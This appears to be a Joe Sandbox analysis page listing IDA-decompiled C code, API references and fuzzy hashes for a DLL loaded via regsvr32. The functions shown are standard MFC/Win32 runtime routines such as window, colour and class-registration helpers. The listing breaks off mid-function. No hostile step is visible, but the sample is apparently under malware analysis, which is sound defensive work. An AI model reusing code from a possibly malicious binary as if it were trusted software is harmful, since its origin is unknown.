Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

0x10013cee
0x10013cee
0x10013cee
0x10013cf5
0x10013cff
0x10013d0b
0x10013d11
0x10013d16
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d74
0x10013d7f

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0xe86d94f5
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

0x1000c209
0x1000c20a
0x1000c217
0x1000c21e
0x1000c22d
0x1000c233
0x1000c236
0x1000c239
0x1000c23e
0x1000c249
0x1000c24e
0x1000c251
0x1000c256
0x1000c256
0x1000c25c
0x1000c264
0x1000c26c
0x1000c291
0x1000c291
0x1000c293
0x1000c295
0x1000c295
0x00000000
0x1000c279
0x1000c283
0x1000c28b
0x00000000
0x1000c28d
0x1000c28d
0x1000c298
0x1000c298
0x1000c29e
0x1000c2a2
0x1000c2a5
0x1000c2ad
0x1000c2b4
0x1000c2b4
0x1000c2ad
0x1000c2bd
0x1000c2c5
0x1000c2cb
0x1000c2de
0x1000c2de
0x1000c2de
0x1000c2cd
0x1000c2d3
0x1000c2d5
0x1000c2d5
0x1000c2d3
0x1000c2cb
0x1000c2e5
0x1000c2e7
0x1000c2eb
0x1000c2f2
0x1000c2f5
0x1000c306
0x1000c308
0x1000c30a
0x1000c30a
0x1000c2ed
0x1000c2ed
0x1000c2ed
0x1000c311
0x1000c317
0x1000c318
0x1000c31b
0x1000c328
0x1000c32a
0x1000c32f
0x1000c32f
0x1000c335
0x1000c33c
0x1000c33c
0x1000c344
0x1000c352
0x1000c353
0x1000c356
0x1000c363
0x1000c363
0x1000c28b

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x1000c166
0x1000c16e
0x1000c170
0x1000c18d
0x1000c19b
0x1000c1a6
0x1000c1a8
0x1000c1aa
0x1000c1ac
0x1000c1b7
0x1000c1b9
0x1000c1c6
0x1000c1c6
0x1000c1c8
0x1000c1ce
0x1000c1d2
0x1000c1f0
0x1000c1e3
0x1000c1e6
0x1000c1e8
0x1000c1e8
0x1000c1d2
0x1000c1f9
0x00000000
0x00000000
0x00000000
0x1000c1ae
0x1000c1ae
0x1000c1af
0x1000c1b1
0x1000c1b3
0x00000000
0x1000c1ae
0x1000c1a0
0x1000c1a2
0x1000c1a4
0x00000000
0x00000000
0x00000000
0x1000c1a4
0x1000c172
0x1000c179
0x1000c188
0x1000c188
0x00000000
0x1000c188
0x1000c17b
0x1000c182
0x00000000
0x00000000
0x1000c184
0x00000000

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x10014129
0x10014135
0x10014137
0x1001417a
0x1001417a
0x1001417c
0x10014180
0x00000000
0x00000000
0x10014146
0x1001415d
0x10014163
0x10014175
0x00000000
0x10014188
0x10014175
0x10014177
0x10014179
0x10014179
0x10014185

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32(00000000), ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

0x10012406
0x1001240c
0x10012411
0x10012419
0x10012419
0x1001241c
0x00000000
0x10012420
0x10012426
0x10012427
0x10012428
0x10012432
0x10012434
0x10012441
0x10012444
0x10012449
0x10012452
0x10012455
0x1001245a
0x1001245b
0x1001245e
0x10012461
0x10012466
0x10012467
0x1001246e
0x10012475
0x1001247a
0x1001247c
0x1001247e
0x1001247e
0x1001247e
0x1001247c
0x1001247f
0x10012483
0x10012485
0x1001248f
0x10012490
0x10012497
